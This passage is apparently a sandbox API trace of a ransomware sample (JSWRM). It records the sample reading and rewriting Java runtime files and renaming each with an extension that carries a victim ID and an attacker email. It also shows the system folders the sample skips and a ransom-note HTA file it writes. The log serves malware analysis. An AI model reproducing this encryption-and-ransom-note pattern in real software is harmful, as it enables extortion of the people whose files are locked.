0x2093c8 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0069.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.908] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xf8) returned 0x20e550 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.908] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\sRGB.pf.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\srgb.pf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.908] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209878 | out: hHeap=0x1e0000) returned 1 [0069.909] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xc48, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="sRGB.pf", cAlternateFileName="")) returned 0 [0069.909] FindClose (in: hFindFile=0x232000 | out: hFindFile=0x232000) returned 1 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ef0 | out: hHeap=0x1e0000) returned 1 [0069.909] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15ac, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="content-types.properties", cAlternateFileName="CONTEN~1.PRO")) returned 1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2=".") returned 1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="..") returned 1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="...") returned 1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="windows") returned -1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="recovery") returned -1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="perflogs") returned -1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="documents and settings") returned -1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="$RECYCLE.BIN") returned 1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="system volume information") returned -1 [0069.909] lstrcmpiW (lpString1="content-types.properties", lpString2="msocache") returned -1 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e268 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x241128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="content-types.properties", lpUsedDefaultChar=0x0) returned 24 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="content-types.properties", cchWideChar=24, lpMultiByteStr=0x241330, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="content-types.properties", lpUsedDefaultChar=0x0) returned 24 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0069.909] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.909] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.909] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0069.910] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.910] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=5548) returned 1 [0069.910] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.910] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x15a0) returned 0x24d1d8 [0069.910] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x15a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x15a0, lpOverlapped=0x0) returned 1 [0069.912] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.912] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x15a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x15a0, lpOverlapped=0x0) returned 1 [0069.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.912] CloseHandle (hObject=0x454) returned 1 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0069.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.912] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0069.912] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.913] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\content-types.properties.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\content-types.properties.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0069.913] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0069.913] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8b6bdff, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8b6bdff, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x101a, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="currency.data", cAlternateFileName="CURREN~1.DAT")) returned 1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2=".") returned 1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="..") returned 1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="...") returned 1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="windows") returned -1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="recovery") returned -1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="perflogs") returned -1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="documents and settings") returned -1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="$RECYCLE.BIN") returned 1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="system volume information") returned -1 [0069.913] lstrcmpiW (lpString1="currency.data", lpString2="msocache") returned -1 [0069.913] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="currency.data", lpUsedDefaultChar=0x0) returned 13 [0069.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="currency.data", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="currency.data", lpUsedDefaultChar=0x0) returned 13 [0069.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0069.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.914] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.914] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.914] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.914] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4122) returned 1 [0069.914] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.914] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1010) returned 0x24d1d8 [0069.914] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x1010, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x1010, lpOverlapped=0x0) returned 1 [0069.916] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.916] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x1010, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x1010, lpOverlapped=0x0) returned 1 [0069.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.916] CloseHandle (hObject=0x454) returned 1 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0069.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0069.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0069.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2256e0 [0069.916] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0069.916] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2256e0 | out: hHeap=0x1e0000) returned 1 [0069.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f970 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0069.917] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f970 | out: hHeap=0x1e0000) returned 1 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.917] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa8b6bdff, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa10e432c, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa8b9204e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="deploy", cAlternateFileName="")) returned 1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2=".") returned 1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="..") returned 1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="...") returned 1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="windows") returned -1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="recovery") returned -1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="perflogs") returned -1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="documents and settings") returned -1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="$RECYCLE.BIN") returned 1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="system volume information") returned -1 [0069.917] lstrcmpiW (lpString1="deploy", lpString2="msocache") returned -1 [0069.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232db8 [0069.917] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0069.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217e00 [0069.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\jswrm-decrypt.hta")) returned 0xffffffff [0069.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217e00 | out: hHeap=0x1e0000) returned 1 [0069.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.920] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0069.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0069.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.920] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0069.920] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209170 | out: hHeap=0x1e0000) returned 1 [0069.920] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.922] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.922] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.923] CloseHandle (hObject=0x454) returned 1 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233028 [0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.923] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x2170f0 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\jswrm-decrypt.hta")) returned 0x20 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2170f0 | out: hHeap=0x1e0000) returned 1 [0069.923] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 